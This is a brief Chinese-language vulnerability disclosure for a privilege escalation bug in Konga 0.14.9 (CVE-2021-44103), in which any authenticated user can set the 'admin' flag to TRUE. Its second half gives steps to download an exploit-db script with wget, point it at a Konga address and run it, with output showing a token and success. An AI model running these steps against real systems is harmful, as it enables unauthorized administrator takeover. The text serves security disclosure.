KONGA 0.14.9 - 权限提升的概念验证。
2021 年 11 月 16 日,Fabrício Salomão 和我在 Konga API 网关中发现了一个漏洞,允许任何经过身份验证的用户成为管理员。
产品:KONGA
型号:0.14.9
漏洞类型:权限提升
影响:完全管理员访问权限(垂直权限提升)
认证:需要
Exploit 作者:Fabricio Salomao / Paulo Trindade
下面创建了一个名为 "usernormal" 的普通用户,没有任何权限。


通过下面的请求,参数 "admin" 中的标志 "FALSE" 被改为 "TRUE"。

因此为我们创建了一个 Exploit:https://www.exploit-db.com/exploits/50521

运行 Exploit 后,权限提升成功!
结果:

wget https://www.exploit-db.com/raw/50521 -O 50521.py
Edit 50521.py
Modify:
urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password
Execute:
python 50521.py
[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
https://www.exploit-db.com/exploits/50521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103
https://github.com/advisories/GHSA-f2mp-8fgg-7465
https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821